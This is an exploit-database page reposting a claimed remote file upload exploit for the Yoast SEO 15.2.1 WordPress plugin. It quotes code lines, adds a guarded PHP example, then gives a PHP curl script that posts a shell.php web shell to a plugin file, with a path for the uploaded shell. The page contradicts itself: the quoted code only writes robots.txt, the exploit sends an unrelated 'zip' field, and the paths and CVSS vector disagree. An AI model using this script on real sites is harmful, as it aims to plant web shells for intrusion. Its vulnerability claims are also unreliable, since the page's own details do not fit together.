Wordpress Plugin Yoast SEO 15.2.1 - Remote File Upload

CVE: CVE-2021-24294
Category: CWE-434
Price: $5,000 - $25,000
Severity: High
Author: Hezi Shimon
Risk: High
Exploitation Type: Remote
Date: 2020-11-11
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.8
EPSSP: 0.95


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020110084

Below is a copy:

Wordpress Plugin Yoast SEO 15.2.1 - Remote File Upload
* Exploit Title: Wordpress Plugin Yoast SEO 15.2.1 - Remote File Upload
* Google Dork: N/A
* Date: 2020.11.10
* Exploit Author: OmideMehraban
* Vendor Homepage: https://wordpress.org/plugins/wordpress-seo
* Software Link: https://wordpress.org/plugins/wordpress-seo
* Category: webapps
* Version: 15.2.1
* Tested on: Windows 10, Firefox
* CVE : N/A

Vulnerable Source:
  61: fwrite($f, $robotsnew);
  60: $f = fopen($robots_file, 'w+'); 
  21: $robots_file = $home_path . 'robots.txt'; 
  18: $home_path = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR;  // if(!is_writable($home_path) && !empty($_SERVER)), 
  15: $home_path = get_home_path(); 
  58: $robotsnew = sanitize_textarea_field(wp_unslash($_POST['robotsnew'])); 
        requires:
  45: if(isset($_POST['submitrobots']))
  57: if(isset($_POST['robotsnew']) && file_exists($robots_file))
  59: if(is_writable($robots_file))
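The lines above show the write path: a POST body reaches a plugin view file and ends in fwrite() on robots.txt, gated only by file_exists() and is_writable(). The block below is an added example written for this page, not Yoast SEO's code or its fix. It restates that write pattern as an unguarded function, then shows the same write behind the guards a WordPress admin view is expected to carry: an ABSPATH check so the file does nothing when requested directly under wp-content/plugins/, a capability check, and a nonce check. The example_ function names and the 'example_edit_robots' nonce action are assumptions chosen for this example.

```php
<?php
// Added example (not the plugin's code). Standard WordPress guard: when this
// file is requested directly by URL rather than included by WordPress, ABSPATH
// is not defined and the script stops before any $_POST handling runs.
if (!defined('ABSPATH')) {
    exit;
}

// Unguarded: mirrors the advisory's quoted lines. Any POST that reaches this
// code with submitrobots and robotsnew set rewrites robots.txt, with no check
// of who sent it or whether it came from the plugin's own form.
function example_robots_write_unguarded(string $home_path): bool
{
    $robots_file = $home_path . 'robots.txt';
    if (!isset($_POST['submitrobots'], $_POST['robotsnew'])) {
        return false;
    }
    if (!file_exists($robots_file) || !is_writable($robots_file)) {
        return false;
    }
    $robotsnew = sanitize_textarea_field(wp_unslash($_POST['robotsnew']));
    $f = fopen($robots_file, 'w+');
    fwrite($f, $robotsnew);
    fclose($f);
    return true;
}

// Guarded: identical write, reached only when
//  1. the current user holds a capability appropriate for editing site files;
//  2. the POST carries a valid nonce bound to this specific action
//     (check_admin_referer() terminates the request on a missing or invalid nonce).
// 'example_edit_robots' is a nonce action name assumed for this example.
function example_robots_write_guarded(string $home_path): bool
{
    if (!current_user_can('manage_options')) {
        return false;
    }
    if (!isset($_POST['submitrobots'], $_POST['robotsnew'])) {
        return false;
    }
    check_admin_referer('example_edit_robots');

    $robots_file = $home_path . 'robots.txt';
    if (!file_exists($robots_file) || !is_writable($robots_file)) {
        return false;
    }
    $robotsnew = sanitize_textarea_field(wp_unslash($_POST['robotsnew']));
    // file_put_contents() replaces the fopen/fwrite/fclose sequence and
    // reports failure instead of silently writing nothing.
    return file_put_contents($robots_file, $robotsnew) !== false;
}

// The form that submits to the guarded handler must emit the matching nonce
// field, otherwise every legitimate submission is rejected as well:
//   wp_nonce_field('example_edit_robots');
```

Usage note: the ABSPATH guard is the check that matters most for the pattern described in this advisory, since it is what stops a plugin view file from running when fetched directly by its path; the capability and nonce checks close the remaining gap for requests that do arrive through WordPress.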

Exploit:
<?php
$Omid="shell.php";
$ch = curl_init("http://localhost/wordpress/wp-content/admin/views/tool-file-editor.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$Omid"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>

Location File:
http://localhost/wordpress/wp-content/plugins/admin/views/tool-file-editor.php/Shell.php;.jpg

********************************************************* 
* Discovered By OmideMehraban
* Instagram: @omidemehraban
* Telegram: @omiid
********************************************************* 

Copyright ©2024 Exploitalert.
